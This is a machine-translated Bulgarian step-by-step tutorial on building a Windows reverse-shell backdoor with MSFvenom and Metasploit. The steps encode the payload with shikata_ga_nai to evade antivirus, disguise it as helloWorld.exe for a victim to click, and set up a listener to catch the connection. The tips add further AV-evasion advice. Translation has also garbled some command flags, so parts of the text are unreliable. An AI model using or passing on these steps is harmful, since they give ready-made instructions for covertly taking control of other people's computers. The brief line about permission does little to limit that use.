Задната врата се използва за заобикаляне на механизмите за сигурност, често тайно и най -вече неоткриваемо. Използвайки MSFvenom, комбинацията от msfpayload и msfencode, е възможно да се създаде задна врата, която да се свърже обратно към нападателя, като се използва TCP с обратна обвивка. За да развиете бекдор, трябва да промените подписа на вашия зловреден софтуер, за да избегнете всеки антивирусен софтуер. Завършете този проект на чифт компютри, до които имате разрешение за достъп, и в процеса ще научите повече за компютърната сигурност и как работи този вид задни врати.
Стъпки
Стъпка 1. Стартирайте Kali и стартирайте терминалната конзола
Стъпка 2. Въведете ifconfig, за да се покаже интерфейсът и проверете вашия IP адрес
Стъпка 3. Въведете msfvenom -l енкодери, за да покажете списъка с енкодери
Ще използвате x86/shikata_ga_nai като енкодер
Стъпка 4. Въведете „msfvenom -a x86 -платформа windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe
- -a x86 -прозорците на платформата обозначават използваната архитектура.
- -p windows/shell/reverse_tcp определя полезния товар за вграждане.
- LHOST обозначава IP адреса на слушателя.
- LPORT обозначава порта за слушател.
- -b "\ x00" означава да се избегнат лоши символи (нулеви байтове).
- -e x86/shikata_ga_nai обозначава името на енкодерите.
- -f exe> helloWorld.exe обозначава изходния формат.
Стъпка 5. Въведете msfconsole, за да активирате Metasploit
Сега сте генерирали своя задна врата. Когато жертвата кликне върху helloWorld.exe, вграденият полезен товар на черупката ще бъде активиран и ще направи връзка обратно към вашата система. За да получите връзката, трябва да отворите мулти-манипулатора в Metasploit и да зададете полезния товар
Стъпка 6. Въведете use exploit/multi/handler
Стъпка 7. Въведете set payload windows/shell/reverse_tcp
Стъпка 8. Въведете show options, за да проверите модула
Стъпка 9. Тип набор LHOST 192.168.48.129
"LHOST" обозначава IP адреса на слушателя
Стъпка 10. Тип набор LPORT 4444
"LPORT" обозначава порта за слушател
Стъпка 11. Въведете run и изчакайте връзката от машината на жертвата
Стъпка 12. Изчакайте жертвата да кликне върху helloWorld.exe
След това ще бъдете успешно свързани с машината на жертвата.
Съвети
- Използването на -i в MSFvenom ще представлява итерациите на кодирането. Понякога повече повторения могат да помогнат за избягване на AV софтуера.
- Научихте как да генерирате задната врата и да кодирате с помощта на MSFvenom, но този метод няма да работи перфектно срещу някои от AV софтуера в днешно време. Причината за това е поради шаблоните за изпълнение в MSFvenom. Доставчиците на AV са добавили статичния подпис на тези шаблони и просто ги търсят. Решението на този проблем е да използвате различен шаблон за изпълнение или различни инструменти.